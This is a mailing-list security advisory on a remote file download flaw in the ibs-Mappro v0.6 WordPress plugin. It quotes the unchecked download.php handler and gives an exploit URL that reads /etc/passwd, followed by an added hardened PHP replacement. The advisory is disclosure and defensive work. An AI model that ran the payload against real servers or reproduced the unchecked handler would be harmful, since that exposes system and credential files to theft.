oss-sec mailing list archives
Remote file download vulnerability in ibs-Mappro v0.6 Wordpress plugin
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Thu, 09 Jul 2015 15:11:33 -0400
Title: Remote file download vulnerability in ibs-Mappro v0.6 Wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-08
Download Site: https://wordpress.org/plugins/ibs-mappro/
Vendor: Hmoore71
Vendor Notified: 2015-07-08, resolved in v1.0.
Vendor Contact: Contacted via webform
Advisory: http://www.vapid.dhs.org/advisory.php?v=137

Description: IBS Mappro is a comprehensive map creator, editor, and view generator based on the Google Maps API v3 and supports kml, kmz, and gpx map files.

Vulnerability: the download.php script allows any remote user to download files off of the server:

    if (isset($_GET)) {
        $filename = $_GET['file'];
        $info = pathinfo($filename);
        $name = $info['basename'];
        if (file_exists($filename)) {
            header('Set-Cookie: fileDownload=true; path=/');
            header('Cache-Control: max-age=60, must-revalidate');
            header('Content-Disposition: attachment; filename="' . $title . '-' . $timestamp . '.csv"');
            header('Content-Description: File Transfer');
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename="' . $name . '"');
            header('Content-Transfer-Encoding: binary');
            header('Expires: 0');
            header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
            header('Pragma: public');
            header('Content-Length: ' . filesize($filename));
            ob_clean();
            flush();
            readfile($filename);
            exit;
        } else {
            die;
        }
    } else {
        die;
    }
    ?>

CVEID: Please assign.
OSVDB: TDB

Exploit Code:
http://example.com/wp-content/plugins/ibs-mappro/lib/download.php?file=/etc/passwd
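Added example (not part of the original advisory and not the vendor's v1.0 fix): one way a download handler like the one quoted above can confine the `file` parameter to a single directory and to the map formats the plugin description lists, instead of passing it straight to readfile(). The directory name MAP_DIR, the constant ALLOWED_EXT and the function resolve_download() are assumptions made for illustration.

```php
<?php
// Added example: hypothetical hardened download handler, not the plugin's code.
// MAP_DIR, ALLOWED_EXT and resolve_download() are illustrative assumptions.
const MAP_DIR = __DIR__ . '/maps';          // assumed storage directory for map files
const ALLOWED_EXT = ['kml', 'kmz', 'gpx'];  // formats named in the plugin description

// Map a requested name to a regular file inside $baseDir, or return null.
function resolve_download(string $requested, string $baseDir): ?string
{
    $base = realpath($baseDir);
    if ($base === false || strpos($requested, "\0") !== false) {
        return null;
    }
    // Keep only the final path component so any directory part is discarded.
    $name = basename(str_replace('\\', '/', $requested));
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if ($name === '' || !in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // realpath() resolves symlinks, so containment is checked on the final target.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || !is_file($path)) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Web entry point; skipped under the CLI so the function can be exercised alone.
if (PHP_SAPI !== 'cli') {
    $file = $_GET['file'] ?? null;
    $path = is_string($file) ? resolve_download($file, MAP_DIR) : null;
    if ($path === null) {
        http_response_code(404);
        exit;
    }
    // Restrict the header value to characters that cannot break the quoted string.
    $safeName = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($path));
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $safeName . '"');
    header('Content-Length: ' . filesize($path));
    header('X-Content-Type-Options: nosniff');
    readfile($path);
    exit;
}
```

With this check, a request naming an absolute path or a file outside MAP_DIR resolves to null and receives a 404 rather than the file contents.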